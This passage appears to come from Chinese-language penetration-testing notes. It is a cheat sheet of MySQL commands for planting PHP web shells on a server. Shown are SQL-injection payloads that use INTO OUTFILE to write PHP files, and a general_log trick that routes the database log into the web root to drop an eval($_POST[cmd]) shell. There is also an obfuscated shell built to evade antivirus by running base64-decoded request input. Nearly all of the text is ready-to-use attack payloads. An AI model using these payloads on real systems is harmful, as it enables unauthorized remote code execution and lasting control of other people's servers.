select * from admin where id =-1 union select 1,'<?php phpinfo();?>',3,4 into outfile 'c:\\1.php'
select * from admin where id =-1 or 1=1 limit 0,1 INTO OUTFILE 'c:/2.php' LINES TERMINATED BY 0x3C3F70687020706870696E666F28293B3F3E--
3.通過數據庫日志寫shell
outfile被禁止,或者寫入文件被攔截;
在數據庫中操作如下:(必須是root權限)
show variables like '%general%'; #查看配置
set global general_log = on; #開啟general log模式
set global general_log_file = '/var/www/html/1.php'; #設置日志目錄為shell地址
select '
<?php eval($_POST[cmd]);?>
' #寫入shell
SQL查詢免殺shell的語句
SELECT "<?php $p = array('f'=>'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_= 'a'.$_.'rt';$_(base64_decode($_REQUEST['username']));?>"
4.遇見其他攔截用;過濾后面的語句